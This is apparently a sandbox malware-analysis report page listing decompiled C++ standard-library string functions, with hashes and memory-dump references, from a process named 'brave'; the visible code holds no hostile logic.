Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
API String ID: 3510742995-2669816585
Opcode ID: 336f956ad0847754b7ed12ec066e3f99e5549a7b523b592d2852de853e97e5d0
Instruction ID: f9f83d0fe846ceb6c2856607b21042df8dc89036f243f32f808c4d20fe2b8499
Opcode Fuzzy Hash: 336f956ad0847754b7ed12ec066e3f99e5549a7b523b592d2852de853e97e5d0
Instruction Fuzzy Hash: 60F096A6E06B8585D600AF71D94149CA361FB59F84F844172DE4C53325DF3DD5A2C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A602F1C0 Relevance: 2.5, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF67FF6A602F1C0(void* __rcx, intOrPtr* __rdx, signed int __r8, void* __r9) {
				long long _v24;
				void* _t8;
				void* _t13;
				intOrPtr _t22;

				_t22 =  *((intOrPtr*)(__rdx + 8));
				_t13 = _t22 - __r8;
				_t20 =  <=  ? _t13 : __r9;
				if (__r8 - _t22 > 0) goto 0xa602f1f6;
				_v24 =  <=  ? _t13 : __r9;
				return E00007FF67FF6A602DEF0(0, _t8, __rcx, __rdx,  *((intOrPtr*)(__rcx + 8)),  *__rdx + __r8 * 2);
			}

0x7ff6a602f1c4
0x7ff6a602f1cb
0x7ff6a602f1d1
0x7ff6a602f1db
0x7ff6a602f1dd
0x7ff6a602f1f5

Strings

basic_string::assign, xrefs: 00007FF6A602F1F9
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A602F200

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
API String ID: 3510742995-2669816585
Opcode ID: 8a923c3d374cfffc7e0aa0d47eacc92a0f8a036f2f6f80d67fa431de05af8495
Instruction ID: 63eb30f114c04bc692ed6007c040a69b9d820852225b47210e047727a883ff10
Opcode Fuzzy Hash: 8a923c3d374cfffc7e0aa0d47eacc92a0f8a036f2f6f80d67fa431de05af8495
Instruction Fuzzy Hash: BEF090A6E06B8585DA00AF79D9014ACA331FBA9F84F944172EA4C53726DF3DD9A2C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6025530 Relevance: 2.5, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A6025530(signed int** __rcx, intOrPtr* __rdx, void* __r8, void* __r9) {
				intOrPtr _t8;

				_t8 =  *((intOrPtr*)(__rdx + 8));
				if (__r8 - _t8 > 0) goto 0xa6025576;
				 *((long long*)(__rcx)) = __rcx + 0x10;
				_t10 =  >  ? __r9 : _t8 - __r8;
				r9d = 0;
				return E00007FF67FF6A602B310(__rcx,  *__rdx + __r8,  *__rdx + __r8 + ( >  ? __r9 : _t8 - __r8));
			}

0x7ff6a6025536
0x7ff6a6025540
0x7ff6a6025549
0x7ff6a6025556
0x7ff6a602555d
0x7ff6a6025575

Strings

basic_string::substr, xrefs: 00007FF6A6025579
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A6025580

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 101c97d25de8f3686c31f21e631c822240c8c23bd588f4edd234e44d22aeb880
Instruction ID: ea67b686e8a609bbf0db7cc02a0559957f8891b467a0c5c2b3abbd5ab94bd462
Opcode Fuzzy Hash: 101c97d25de8f3686c31f21e631c822240c8c23bd588f4edd234e44d22aeb880
Instruction Fuzzy Hash: 63F0E962F1170641EE00DFAAE1904B8A320FB65FC4B505432CA0DA7310DE3DE191C344

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60322E0 Relevance: 1.4, Strings: 1, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00007FF67FF6A60322E0() {
				long long _v584;
				void* _t81;
				void* _t83;
				void* _t84;
				int*** _t87;
				intOrPtr _t88;
				int** _t89;
				intOrPtr _t90;
				int* _t91;
				intOrPtr _t92;
				int _t93;
				long long* _t102;
				void* _t103;
				void* _t104;
				int _t119;
				int _t127;
				void* _t193;
				void* _t194;
				int _t195;
				int _t196;
				int _t197;
				int _t198;
				int _t199;
				int _t200;
				int _t201;
				int _t202;
				void* _t204;
				int _t210;
				int _t214;

				E00007FF67FF6A60319A0(_t83, _t84, _t87, _t104);
				_t88 =  *0xa62b6830; // 0x7ff6a62b7390
				_t89 = _t88 + 0x10;
				 *_t87 = _t89;
				E00007FF67FF6A6032160(8, _t81, _t89, _t103, _t87, 0xa62b6cb0, 0x7ff6a6030fb0, _t193, _t194, _t204);
				0;
				0;
				E00007FF67FF6A60319A0(_t83, _t84, _t89, _t87);
				_t90 =  *0xa62b6820; // 0x7ff6a62b7360
				_t91 = _t90 + 0x10;
				 *_t89 = _t91;
				E00007FF67FF6A6032160(8, _t81, _t91, _t103, _t89, 0xa62b6c90, 0x7ff6a6030f70, _t193, _t194, _t204);
				0;
				0;
				E00007FF67FF6A60319A0(_t83, _t84, _t91, _t89);
				_t107 = _t91;
				_t92 =  *0xa62b6770; // 0x7ff6a62b7150
				_t93 = _t92 + 0x10;
				 *_t91 = _t93;
				E00007FF67FF6A6032160(8, _t81, _t93, _t103, _t91, 0xa62b6b30, 0x7ff6a6029670, _t193, _t194, _t204);
				0;
				0;
				_push(_t204);
				_push(_t194);
				E00007FF67FF6A60319A0(_t83, _t84, _t93, _t107);
				_t195 = _t93;
				E00007FF67FF6A6029680(_t93, _t107);
				E00007FF67FF6A6032160(0x10, _t81, _t93, _t103, _t195, 0xa62b6b50, 0x7ff6a60297b0, _t193, _t195, _t107);
				_t206 = _t93;
				E00007FF67FF6A6031CF0(_t195);
				E00007FF67FF6A600FEC0();
				_push(_t93);
				_push(_t195);
				E00007FF67FF6A60319A0(_t83, _t84, _t93, _t93);
				_t196 = _t93;
				E00007FF67FF6A6029F90(_t93, _t93);
				E00007FF67FF6A6032160(0x10, _t81, _t93, _t103, _t196, 0xa62b6b90, 0x7ff6a602a0b0, _t193, _t196, _t206);
				_t208 = _t93;
				E00007FF67FF6A6031CF0(_t196);
				E00007FF67FF6A600FEC0();
				_push(_t93);
				_push(_t196);
				E00007FF67FF6A60319A0(_t83, _t84, _t93, _t93);
				_t197 = _t93;
				E00007FF67FF6A602AC70(_t93, _t93);
				E00007FF67FF6A6032160(0x10, _t81, _t93, _t103, _t197, 0xa62b6c70, 0x7ff6a602ad90, _t193, _t197, _t208);
				_t210 = _t93;
				E00007FF67FF6A6031CF0(_t197);
				_t119 = _t210;
				E00007FF67FF6A600FEC0();
				_push(_t210);
				_push(_t197);
				E00007FF67FF6A60319A0(_t83, _t84, _t93, _t119);
				_t198 = _t93;
				E00007FF67FF6A602A110(_t93, _t119);
				E00007FF67FF6A6032160(0x10, _t81, _t93, _t103, _t198, 0xa62b6bb0, 0x7ff6a602a230, _t193, _t198, _t119);
				_t212 = _t93;
				E00007FF67FF6A6031CF0(_t198);
				E00007FF67FF6A600FEC0();
				_push(_t93);
				_push(_t198);
				E00007FF67FF6A60319A0(_t83, _t84, _t93, _t93);
				_t199 = _t93;
				E00007FF67FF6A602A290(_t93, _t93);
				E00007FF67FF6A6032160(0x10, _t81, _t93, _t103, _t199, 0xa62b6bd0, 0x7ff6a602a3b0, _t193, _t199, _t212);
				_t214 = _t93;
				E00007FF67FF6A6031CF0(_t199);
				_t127 = _t214;
				E00007FF67FF6A600FEC0();
				_push(_t214);
				_push(_t199);
				E00007FF67FF6A60319A0(_t83, _t84, _t93, _t127);
				_t200 = _t93;
				E00007FF67FF6A602A7A0(_t93, _t127);
				E00007FF67FF6A6032160(0x10, _t81, _t93, _t103, _t200, 0xa62b6c10, 0x7ff6a602a8d0, _t193, _t200, _t127);
				_t216 = _t93;
				E00007FF67FF6A6031CF0(_t200);
				E00007FF67FF6A600FEC0();
				_push(_t93);
				_push(_t200);
				E00007FF67FF6A60319A0(_t83, _t84, _t93, _t93);
				_t201 = _t93;
				E00007FF67FF6A6029850(_t93, _t93);
				E00007FF67FF6A6032160(0x10, _t81, _t93, _t103, _t201, 0xa62b6b70, 0x7ff6a6029970, _t193, _t201, _t216);
				_t218 = _t93;
				E00007FF67FF6A6031CF0(_t201);
				E00007FF67FF6A600FEC0();
				_push(_t93);
				_push(_t201);
				E00007FF67FF6A60319A0(_t83, _t84, _t93, _t93);
				_t202 = _t93;
				E00007FF67FF6A602A970(_t93, _t93);
				E00007FF67FF6A6032160(0x10, _t81, _t93, _t103, _t202, 0xa62b6c30, 0x7ff6a602aa90, _t193, _t202, _t218);
				_t220 = _t93;
				E00007FF67FF6A6031CF0(_t202);
				E00007FF67FF6A600FEC0();
				_push(_t93);
				E00007FF67FF6A60319A0(_t83, _t84, _t93, _t93);
				E00007FF67FF6A602AAF0(_t93, _t93);
				E00007FF67FF6A6032160(0x10, _t81, _t93, _t103, _t93, 0xa62b6c50, 0x7ff6a602ac10, _t193, _t93, _t220);
				E00007FF67FF6A6031CF0(_t93);
				E00007FF67FF6A600FEC0();
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				 *0 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				_t102 =  *0x10;
				asm("ud2");
				0;
				E00007FF67FF6A6010980(0xa62b2d20, 0xa62b6c50);
				 *0xa62b2d38 = 0x12400; // executed
				malloc(_t202); // executed
				 *0xa62b2d30 = _t102;
				if (_t102 == 0) goto 0xa6032789;
				 *0xa62b2d28 = _t102;
				 *_t102 = 0x12400;
				 *((long long*)(_t102 + 8)) = 0;
				goto E00007FF67FF6A6001520;
				 *0xa62b2d38 = 0;
				 *0xa62b2d28 = 0;
				goto 0xa6032779;
				0;
				0;
				0;
			}

0x7ff6a60322e9
0x7ff6a60322ff
0x7ff6a6032306
0x7ff6a603230a
0x7ff6a603230d
0x7ff6a6032318
0x7ff6a603231c
0x7ff6a6032329
0x7ff6a603233f
0x7ff6a6032346
0x7ff6a603234a
0x7ff6a603234d
0x7ff6a6032358
0x7ff6a603235c
0x7ff6a6032369
0x7ff6a603237c
0x7ff6a603237f
0x7ff6a6032386
0x7ff6a603238a
0x7ff6a603238d
0x7ff6a6032398
0x7ff6a603239c
0x7ff6a60323a0
0x7ff6a60323a2
0x7ff6a60323b0
0x7ff6a60323bb
0x7ff6a60323be
0x7ff6a60323d4
0x7ff6a60323d9
0x7ff6a60323df
0x7ff6a60323e7
0x7ff6a60323f0
0x7ff6a60323f2
0x7ff6a6032400
0x7ff6a603240b
0x7ff6a603240e
0x7ff6a6032424
0x7ff6a6032429
0x7ff6a603242f
0x7ff6a6032437
0x7ff6a6032440
0x7ff6a6032442
0x7ff6a6032450
0x7ff6a603245b
0x7ff6a603245e
0x7ff6a6032474
0x7ff6a6032479
0x7ff6a603247f
0x7ff6a6032484
0x7ff6a6032487
0x7ff6a6032490
0x7ff6a6032492
0x7ff6a60324a0
0x7ff6a60324ab
0x7ff6a60324ae
0x7ff6a60324c4
0x7ff6a60324c9
0x7ff6a60324cf
0x7ff6a60324d7
0x7ff6a60324e0
0x7ff6a60324e2
0x7ff6a60324f0
0x7ff6a60324fb
0x7ff6a60324fe
0x7ff6a6032514
0x7ff6a6032519
0x7ff6a603251f
0x7ff6a6032524
0x7ff6a6032527
0x7ff6a6032530
0x7ff6a6032532
0x7ff6a6032540
0x7ff6a603254b
0x7ff6a603254e
0x7ff6a6032564
0x7ff6a6032569
0x7ff6a603256f
0x7ff6a6032577
0x7ff6a6032580
0x7ff6a6032582
0x7ff6a6032590
0x7ff6a603259b
0x7ff6a603259e
0x7ff6a60325b4
0x7ff6a60325b9
0x7ff6a60325bf
0x7ff6a60325c7
0x7ff6a60325d0
0x7ff6a60325d2
0x7ff6a60325e0
0x7ff6a60325eb
0x7ff6a60325ee
0x7ff6a6032604
0x7ff6a6032609
0x7ff6a603260f
0x7ff6a6032617
0x7ff6a6032620
0x7ff6a6032630
0x7ff6a603263e
0x7ff6a6032654
0x7ff6a603265f
0x7ff6a6032667
0x7ff6a6032670
0x7ff6a6032681
0x7ff6a6032683
0x7ff6a6032694
0x7ff6a6032696
0x7ff6a60326a7
0x7ff6a60326a9
0x7ff6a60326ba
0x7ff6a60326bc
0x7ff6a60326c7
0x7ff6a60326c9
0x7ff6a60326da
0x7ff6a60326dc
0x7ff6a60326ed
0x7ff6a60326ef
0x7ff6a6032700
0x7ff6a6032702
0x7ff6a6032713
0x7ff6a6032715
0x7ff6a603271e
0x7ff6a6032726
0x7ff6a603272e
0x7ff6a603273d
0x7ff6a6032747
0x7ff6a6032752
0x7ff6a6032757
0x7ff6a6032761
0x7ff6a6032763
0x7ff6a603276a
0x7ff6a6032771
0x7ff6a6032784
0x7ff6a6032789
0x7ff6a6032794
0x7ff6a603279f
0x7ff6a60327a7
0x7ff6a60327ab
0x7ff6a60327af

Strings

basic_string::_M_create, xrefs: 00007FF6A60323A2

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: strlen$CaptureContextUnwindabortmalloc
String ID: basic_string::_M_create
API String ID: 214865124-3122258987
Opcode ID: 56a730b624957fdfe59585361835cd4944ad67ef4d9076c70fd66d217f432776
Instruction ID: 6d080ff83d02baf0df79a94b2c25f94ad821b5ff10aa10a35d95d2c4144bb35f
Opcode Fuzzy Hash: 56a730b624957fdfe59585361835cd4944ad67ef4d9076c70fd66d217f432776
Instruction Fuzzy Hash: E8419210F1B24754E908BF66AE155FA6221FF5AFC5F802871ED0DDB387DE2EA0A58340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60323A0 Relevance: 1.3, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00007FF67FF6A60323A0() {
				long long _v464;
				void* _t69;
				void* _t71;
				void* _t72;
				int _t74;
				long long* _t83;
				void* _t84;
				void* _t85;
				int _t97;
				int _t105;
				void* _t162;
				int _t163;
				int _t164;
				int _t165;
				int _t166;
				int _t167;
				int _t168;
				int _t169;
				int _t170;
				int _t177;
				int _t181;

				E00007FF67FF6A60319A0(_t71, _t72, _t74, _t85);
				_t163 = _t74;
				E00007FF67FF6A6029680(_t74, _t85);
				E00007FF67FF6A6032160(0x10, _t69, _t74, _t84, _t163, 0xa62b6b50, 0x7ff6a60297b0, _t162, _t163, _t85);
				_t173 = _t74;
				E00007FF67FF6A6031CF0(_t163);
				E00007FF67FF6A600FEC0();
				_push(_t74);
				_push(_t163);
				E00007FF67FF6A60319A0(_t71, _t72, _t74, _t74);
				_t164 = _t74;
				E00007FF67FF6A6029F90(_t74, _t74);
				E00007FF67FF6A6032160(0x10, _t69, _t74, _t84, _t164, 0xa62b6b90, 0x7ff6a602a0b0, _t162, _t164, _t173);
				_t175 = _t74;
				E00007FF67FF6A6031CF0(_t164);
				E00007FF67FF6A600FEC0();
				_push(_t74);
				_push(_t164);
				E00007FF67FF6A60319A0(_t71, _t72, _t74, _t74);
				_t165 = _t74;
				E00007FF67FF6A602AC70(_t74, _t74);
				E00007FF67FF6A6032160(0x10, _t69, _t74, _t84, _t165, 0xa62b6c70, 0x7ff6a602ad90, _t162, _t165, _t175);
				_t177 = _t74;
				E00007FF67FF6A6031CF0(_t165);
				_t97 = _t177;
				E00007FF67FF6A600FEC0();
				_push(_t177);
				_push(_t165);
				E00007FF67FF6A60319A0(_t71, _t72, _t74, _t97);
				_t166 = _t74;
				E00007FF67FF6A602A110(_t74, _t97);
				E00007FF67FF6A6032160(0x10, _t69, _t74, _t84, _t166, 0xa62b6bb0, 0x7ff6a602a230, _t162, _t166, _t97);
				_t179 = _t74;
				E00007FF67FF6A6031CF0(_t166);
				E00007FF67FF6A600FEC0();
				_push(_t74);
				_push(_t166);
				E00007FF67FF6A60319A0(_t71, _t72, _t74, _t74);
				_t167 = _t74;
				E00007FF67FF6A602A290(_t74, _t74);
				E00007FF67FF6A6032160(0x10, _t69, _t74, _t84, _t167, 0xa62b6bd0, 0x7ff6a602a3b0, _t162, _t167, _t179);
				_t181 = _t74;
				E00007FF67FF6A6031CF0(_t167);
				_t105 = _t181;
				E00007FF67FF6A600FEC0();
				_push(_t181);
				_push(_t167);
				E00007FF67FF6A60319A0(_t71, _t72, _t74, _t105);
				_t168 = _t74;
				E00007FF67FF6A602A7A0(_t74, _t105);
				E00007FF67FF6A6032160(0x10, _t69, _t74, _t84, _t168, 0xa62b6c10, 0x7ff6a602a8d0, _t162, _t168, _t105);
				_t183 = _t74;
				E00007FF67FF6A6031CF0(_t168);
				E00007FF67FF6A600FEC0();
				_push(_t74);
				_push(_t168);
				E00007FF67FF6A60319A0(_t71, _t72, _t74, _t74);
				_t169 = _t74;
				E00007FF67FF6A6029850(_t74, _t74);
				E00007FF67FF6A6032160(0x10, _t69, _t74, _t84, _t169, 0xa62b6b70, 0x7ff6a6029970, _t162, _t169, _t183);
				_t185 = _t74;
				E00007FF67FF6A6031CF0(_t169);
				E00007FF67FF6A600FEC0();
				_push(_t74);
				_push(_t169);
				E00007FF67FF6A60319A0(_t71, _t72, _t74, _t74);
				_t170 = _t74;
				E00007FF67FF6A602A970(_t74, _t74);
				E00007FF67FF6A6032160(0x10, _t69, _t74, _t84, _t170, 0xa62b6c30, 0x7ff6a602aa90, _t162, _t170, _t185);
				_t187 = _t74;
				E00007FF67FF6A6031CF0(_t170);
				E00007FF67FF6A600FEC0();
				_push(_t74);
				E00007FF67FF6A60319A0(_t71, _t72, _t74, _t74);
				E00007FF67FF6A602AAF0(_t74, _t74);
				E00007FF67FF6A6032160(0x10, _t69, _t74, _t84, _t74, 0xa62b6c50, 0x7ff6a602ac10, _t162, _t74, _t187);
				E00007FF67FF6A6031CF0(_t74);
				E00007FF67FF6A600FEC0();
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				 *0 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				_t83 =  *0x10;
				asm("ud2");
				0;
				E00007FF67FF6A6010980(0xa62b2d20, 0xa62b6c50);
				 *0xa62b2d38 = 0x12400; // executed
				malloc(_t170); // executed
				 *0xa62b2d30 = _t83;
				if (_t83 == 0) goto 0xa6032789;
				 *0xa62b2d28 = _t83;
				 *_t83 = 0x12400;
				 *((long long*)(_t83 + 8)) = 0;
				goto E00007FF67FF6A6001520;
				 *0xa62b2d38 = 0;
				 *0xa62b2d28 = 0;
				goto 0xa6032779;
				0;
				0;
				0;
			}

0x7ff6a60323b0
0x7ff6a60323bb
0x7ff6a60323be
0x7ff6a60323d4
0x7ff6a60323d9
0x7ff6a60323df
0x7ff6a60323e7
0x7ff6a60323f0
0x7ff6a60323f2
0x7ff6a6032400
0x7ff6a603240b
0x7ff6a603240e
0x7ff6a6032424
0x7ff6a6032429
0x7ff6a603242f
0x7ff6a6032437
0x7ff6a6032440
0x7ff6a6032442
0x7ff6a6032450
0x7ff6a603245b
0x7ff6a603245e
0x7ff6a6032474
0x7ff6a6032479
0x7ff6a603247f
0x7ff6a6032484
0x7ff6a6032487
0x7ff6a6032490
0x7ff6a6032492
0x7ff6a60324a0
0x7ff6a60324ab
0x7ff6a60324ae
0x7ff6a60324c4
0x7ff6a60324c9
0x7ff6a60324cf
0x7ff6a60324d7
0x7ff6a60324e0
0x7ff6a60324e2
0x7ff6a60324f0
0x7ff6a60324fb
0x7ff6a60324fe
0x7ff6a6032514
0x7ff6a6032519
0x7ff6a603251f
0x7ff6a6032524
0x7ff6a6032527
0x7ff6a6032530
0x7ff6a6032532
0x7ff6a6032540
0x7ff6a603254b
0x7ff6a603254e
0x7ff6a6032564
0x7ff6a6032569
0x7ff6a603256f
0x7ff6a6032577
0x7ff6a6032580
0x7ff6a6032582
0x7ff6a6032590
0x7ff6a603259b
0x7ff6a603259e
0x7ff6a60325b4
0x7ff6a60325b9
0x7ff6a60325bf
0x7ff6a60325c7
0x7ff6a60325d0
0x7ff6a60325d2
0x7ff6a60325e0
0x7ff6a60325eb
0x7ff6a60325ee
0x7ff6a6032604
0x7ff6a6032609
0x7ff6a603260f
0x7ff6a6032617
0x7ff6a6032620
0x7ff6a6032630
0x7ff6a603263e
0x7ff6a6032654
0x7ff6a603265f
0x7ff6a6032667
0x7ff6a6032670
0x7ff6a6032681
0x7ff6a6032683
0x7ff6a6032694
0x7ff6a6032696
0x7ff6a60326a7
0x7ff6a60326a9
0x7ff6a60326ba
0x7ff6a60326bc
0x7ff6a60326c7
0x7ff6a60326c9
0x7ff6a60326da
0x7ff6a60326dc
0x7ff6a60326ed
0x7ff6a60326ef
0x7ff6a6032700
0x7ff6a6032702
0x7ff6a6032713
0x7ff6a6032715
0x7ff6a603271e
0x7ff6a6032726
0x7ff6a603272e
0x7ff6a603273d
0x7ff6a6032747
0x7ff6a6032752
0x7ff6a6032757
0x7ff6a6032761
0x7ff6a6032763
0x7ff6a603276a
0x7ff6a6032771
0x7ff6a6032784
0x7ff6a6032789
0x7ff6a6032794
0x7ff6a603279f
0x7ff6a60327a7
0x7ff6a60327ab
0x7ff6a60327af

Strings

basic_string::_M_create, xrefs: 00007FF6A60323A2

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: strlen$CaptureContextUnwindabortmalloc
String ID: basic_string::_M_create
API String ID: 214865124-3122258987
Opcode ID: 07c73089a9c23fa8787c8356b327776d2c61bf32108450415a4ed1dc3e9e7dc6
Instruction ID: a8da12c11ae0ec9ac4f98a18dd925096cced728b0011ff2843a8688571b77a46
Opcode Fuzzy Hash: 07c73089a9c23fa8787c8356b327776d2c61bf32108450415a4ed1dc3e9e7dc6
Instruction Fuzzy Hash: 47114F10F1B18354E848BB636E155F6A251BF8AFC6F802871ED0D9B387DD2EA0A58381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6004C80 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae371a8610d859356a0b0e471f64f9d264ed4058a6e4d7a127b9e3f5264a2ab
Instruction ID: 2184bb2c67a9d49fd1cb6216cd87d9de7e91d34c02ff70d625d76e38e48e9afd
Opcode Fuzzy Hash: dae371a8610d859356a0b0e471f64f9d264ed4058a6e4d7a127b9e3f5264a2ab
Instruction Fuzzy Hash: E5E09A76909B81D1C614DF52F49045EB764F7997C4B104925EECC53B29CF3CD1A08B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6023230 Relevance: 63.2, APIs: 13, Strings: 23, Instructions: 184
fileCOMMON

Download Yara Rule

C-Code - Quality: 17%

